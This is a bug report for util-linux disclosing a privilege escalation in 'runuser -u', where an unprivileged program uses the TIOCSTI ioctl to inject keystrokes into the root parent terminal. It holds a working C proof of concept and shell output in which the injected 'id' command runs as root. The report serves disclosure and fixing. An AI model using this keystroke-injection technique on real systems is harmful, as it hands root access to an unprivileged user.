Package: util-linux Version: all Severity: important
When executing a program via "runuser -u nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation. This issue has been fixed in "su" by calling setsid() and in "sudo" by using the "use_pty" flag # cat test.c #include <sys/ioctl.h> int main() { char *cmd = "id\n"; while(*cmd) ioctl(0, TIOCSTI, cmd++); } # gcc test.c -o test # id saken uid=1000(saken) gid=1000(saken) groups=1000(saken) # runuser -u saken ./test ---> last command i type in id # id ---> did not type this uid=0(root) gid=0(root) groups=0(root) Thanks, Federico Bento ---------------------------------------------------------------- This message was sent using IMP, the Internet Messaging Program.